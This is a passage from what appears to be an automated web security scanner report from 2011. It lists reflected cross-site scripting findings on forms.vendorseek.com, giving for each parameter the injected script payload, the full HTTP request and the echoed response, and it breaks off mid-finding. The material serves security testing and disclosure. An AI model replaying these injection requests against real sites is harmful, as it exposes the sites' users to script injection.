HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:14 GMT Connection: close Set-Cookie: JSESSIONID=0C327276CFAF6BFEE0761D648120B850.app6-all1; Path=/ Set-Cookie: JSESSIONID=FF4F447CF06837452E74C4CF33F1D184.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:14 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033294601; Expires=Sat, 16-Feb-2019 12:48:14 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... C_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ3da96"><script>alert(1)</script>f7d751f0855&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=201142572035 ...[SNIP]...
The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98725"><script>alert(1)</script>035a41fdd3c was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css98725"><script>alert(1)</script>035a41fdd3c&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:47:58 GMT Connection: close Set-Cookie: JSESSIONID=0910819EB9444DED0E32F7B56016470F.app6-all1; Path=/ Set-Cookie: JSESSIONID=280969539BE31D1AA4983B1943C38702.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:58 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033278800; Expires=Sat, 16-Feb-2019 12:47:58 GMT; Path=/ Content-Length: 3857
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... <link rel="stylesheet" href="http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css98725"><script>alert(1)</script>035a41fdd3c"> ...[SNIP]...
The value of the ctnum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c714"><script>alert(1)</script>0772ed318db was submitted in the ctnum parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=15c714"><script>alert(1)</script>0772ed318db&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:47:57 GMT Connection: close Set-Cookie: JSESSIONID=0B2B9F1AF510C2F672A168D452B24955.app5-all1; Path=/ Set-Cookie: JSESSIONID=3871577464F826A4332EED1ACEF87DB2.app5-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:57 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033277011; Expires=Sat, 16-Feb-2019 12:47:57 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... <Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=default&tnum=1&ctnum=15c714"><script>alert(1)</script>0772ed318db&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com ...[SNIP]...
The value of the fc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc2c"><script>alert(1)</script>8ed63916645 was submitted in the fc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=bbc2c"><script>alert(1)</script>8ed63916645&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:05 GMT Connection: close Set-Cookie: JSESSIONID=971716267306361C96314EFB8680F444.app6-all1; Path=/ Set-Cookie: JSESSIONID=3E58315EDD56ED38C0FF84375578D7CD.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:05 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033285157; Expires=Sat, 16-Feb-2019 12:48:05 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... ller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=bbc2c"><script>alert(1)</script>8ed63916645&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503 ...[SNIP]...
The value of the ff request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664d5"><script>alert(1)</script>3b882b3290a was submitted in the ff parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=664d5"><script>alert(1)</script>3b882b3290a&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:03 GMT Connection: close Set-Cookie: JSESSIONID=D4E6A869C34C0515772463B8F903AFA7.app5-all2; Path=/ Set-Cookie: JSESSIONID=3F1FA27067DA4510556969041BAC1E45.app5-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:03 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033283753; Expires=Sat, 16-Feb-2019 12:48:03 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... ntroller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=664d5"><script>alert(1)</script>3b882b3290a&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc20355 ...[SNIP]...
The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe09b"><script>alert(1)</script>af5e37d2a1b was submitted in the ft parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=defaultfe09b"><script>alert(1)</script>af5e37d2a1b&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:47:41 GMT Connection: close Set-Cookie: JSESSIONID=CB81F1344536AB31354E44561D4ECF4F.app5-all1; Path=/ Set-Cookie: JSESSIONID=E26210974A283F4E16B64A40FE650495.app5-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:47:41 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033261045; Expires=Sat, 16-Feb-2019 12:47:41 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... <Input Name="InternalLeadIFrameURL" Value="http://leadformone.quinstreet.com/controller?srvid=67110&ft=defaultfe09b"><script>alert(1)</script>af5e37d2a1b&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw ...[SNIP]...
The value of the hidepriv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db25f"><script>alert(1)</script>07c88f93aad was submitted in the hidepriv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=truedb25f"><script>alert(1)</script>07c88f93aad&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:24 GMT Connection: close Set-Cookie: JSESSIONID=9427C5800EA81EBA82796AA5B99BE117.app5-all2; Path=/ Set-Cookie: JSESSIONID=023303D1ACD45B160E9D80D905189D67.app5-all2; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:24 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033304656; Expires=Sat, 16-Feb-2019 12:48:24 GMT; Path=/ Content-Length: 4121
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=truedb25f"><script>alert(1)</script>07c88f93aad&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/> ...[SNIP]...
3.18. http://forms.vendorseek.com/controller [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forms.vendorseek.com
Path:
/controller
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85097"><script>alert(1)</script>380b955c126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y&85097"><script>alert(1)</script>380b955c126=1 HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:30 GMT Connection: close Set-Cookie: JSESSIONID=9337A9AC4E07168705285D65BB671B4E.app6-all1; Path=/ Set-Cookie: JSESSIONID=CD6559A73D367EA093FA9CB0A8987F49.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:30 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033310902; Expires=Sat, 16-Feb-2019 12:48:30 GMT; Path=/ Content-Length: 3817
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... 10Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y&85097"><script>alert(1)</script>380b955c126=1" Type="hidden"/> ...[SNIP]...
The value of the sdw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131e9"><script>alert(1)</script>2aceb244d19 was submitted in the sdw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com131e9"><script>alert(1)</script>2aceb244d19&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1 Host: forms.vendorseek.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT' Cache-Control: public Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 12:48:08 GMT Connection: close Set-Cookie: JSESSIONID=FCEB432FD39F7053DA305F3F1C7D4797.app6-all1; Path=/ Set-Cookie: JSESSIONID=2BF6FECB1787CEC337E007BF3CE19A56.app6-all1; Path=/ Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:08 GMT; Path=/ Set-Cookie: CLK=166110218044716818#1298033288544; Expires=Sat, 16-Feb-2019 12:48:08 GMT; Path=/ Content-Length: 3814
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam ...[SNIP]... &css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com131e9"><script>alert(1)</script>2aceb244d19&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=2012 ...[SNIP]...
The value of the segid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47aa6"><script>alert(1)</script>17f7ae3a145 was submitted in the segid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
